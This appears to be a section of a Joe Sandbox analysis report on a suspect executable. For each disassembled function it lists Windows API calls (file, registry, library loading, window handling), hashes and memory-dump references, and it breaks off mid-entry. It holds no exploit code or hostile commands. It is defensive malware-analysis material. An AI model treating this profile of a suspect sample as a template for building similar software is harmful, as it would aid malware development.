Opcode Fuzzy Hash: abdb6d04a8628e8e10e6f0e4e307bd878a3efa8eec47d48165f605e3d5e5f129
Instruction Fuzzy Hash: ACF0C236B00100AACB11AFB99E4AEAD33B9AB44724B240577F901F74D5DAFC89419618

Function 004030E7 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 0040310C

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
Instruction ID: 67d9160ce0aa1e2e76d61ceadf7dfe4382c4b6927c35e4cb0672809be5a1f01d
Opcode Fuzzy Hash: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
Instruction Fuzzy Hash: 2D316D30200219EBDB109F55DD84ADA3E68EB08359B10843BF905EA1D0D779DF50DBA9

Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: c6e0b2e8dbd325c6a63e6ba070a9d5cf510bd218eb5002d0b1f80879fa38eeb3
Instruction ID: e180782171dce9fa6fade52b03e39cf5b39f26fab5a396fb1bde1b9fb5ac53b7
Opcode Fuzzy Hash: c6e0b2e8dbd325c6a63e6ba070a9d5cf510bd218eb5002d0b1f80879fa38eeb3
Instruction Fuzzy Hash: 2111A331911205EBDB10CFA0CB489BEB7B4EF44354F20843FE446B72D0D6B85A41DB19

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
Instruction ID: 26eaddb35cdc13faf07641838d00295e4864c68e45bdd86d166378f51b3c2f7b
Opcode Fuzzy Hash: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
Instruction Fuzzy Hash: 3201F431724210EBE7295B389D04B6A3698E710714F10897FF855F62F1D678CC028B5D

Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
RegCloseKey.ADVAPI32(00000000), ref: 00402347

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: e10cef08bc8bbd86e44cd2e6a93393b87c6fb5f379b9916ae68ae103a788fbbd
Instruction ID: 60bb5986470d48ad8cc55f7ac878df2b05d68ac6ea48f0c646ace7267bb4d846
Opcode Fuzzy Hash: e10cef08bc8bbd86e44cd2e6a93393b87c6fb5f379b9916ae68ae103a788fbbd
Instruction Fuzzy Hash: 88F04F32A04110ABEB11BFB59B4EABE72699B40314F15807BF501B71D5D9FC9902962D

Function 00406559 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
GetProcAddress.KERNEL32(00000000,?), ref: 00406586

Part of subcall function 004064ED: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
Part of subcall function 004064ED: wsprintfW.USER32 ref: 0040653F
Part of subcall function 004064ED: LoadLibraryW.KERNELBASE(?), ref: 0040654F

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
Instruction ID: e4d993762fdbf4af8c35b1588ad4eaffa1172a51f023226dd59e00ceba6dfa89
Opcode Fuzzy Hash: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
Instruction Fuzzy Hash: 12E086335042106BD2105B70AF4487773B89E94704306083EF546F2044D778DC329A6D

Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
EnableWindow.USER32(00000000,00000000), ref: 00401DFD

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 075d78e16e831d865290747b9eef420f676278b691cb94837bc861c0c9eb665c
Instruction ID: 2c738a9deecb2df013c07ba3b1cf6af0bd96662f3609e31d22ea84ca5a045a2b
Opcode Fuzzy Hash: 075d78e16e831d865290747b9eef420f676278b691cb94837bc861c0c9eb665c
Instruction Fuzzy Hash: 4FE08C326005009BCB20AFB5AB4999D3375DF50369710007BE442F10E1CABC9C408A2D

Function 00405D58 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\RmIYOfX0yO.exe,80000000,00000003), ref: 00405D5C
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19

Function 00405D33 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405938,?,?,00000000,00405B0E,?,?,?,?), ref: 00405D38
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D4C

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction ID: bbac5bc73aa77dea78574471440e90d8105817861fa72b5948562f5081259be0
Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction Fuzzy Hash: 1CD0C976504520ABC2112728AE0C89BBB55EB54371B028B35FAA9A22B0CB304C568A98

Function 0040582E Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405834
GetLastError.KERNEL32 ref: 00405842

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction ID: 106bcc9dbfec6d9c4c73fbe0ebad0997e3226ea8ec62ae9f19e78208b048f617
Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction Fuzzy Hash: C9C04C31204A019AD6606B209F09B177954EB50741F1184396946E00A0DB348425DE2D

Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9

Function 00405E0A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0040CEF0,004032EF,0040CEF0,?,00414EF0,00004000,?,00000000,00403119,00000004), ref: 00405E1E

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: 23ec5f7379bf279edb3dbb3262258d5736cfdadd2d5b14d2449b9c6e52f850f2
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: 4DE08C3224021EABCF109F50CC08EEB3B6CEB00360F044432FA99E2080D230EA209BE4

Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
Instruction ID: 027cd1837f043f16bcd3791d2c18ee9a5769249626570c171517a7e702d59ee3
Opcode Fuzzy Hash: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
Instruction Fuzzy Hash: 17E0EC76254108BFDB10EFA9EE4BFE97BECAB44704F008435BA09E70E1C674E5509B69

Function 00405DDB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040336B,?,?,0040326F,00414EF0,00004000,?,00000000,00403119), ref: 00405DEF

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction ID: 619b4f5876fe922fe119770d1c4b6382a551d6d1c0a67235faeb4c306daddfa0
Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction Fuzzy Hash: BAE08C3220021AABCF10AF90CC04AEB3B6CEB083A0F004833F951E3140D230E9618BE4

Function 00404293 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

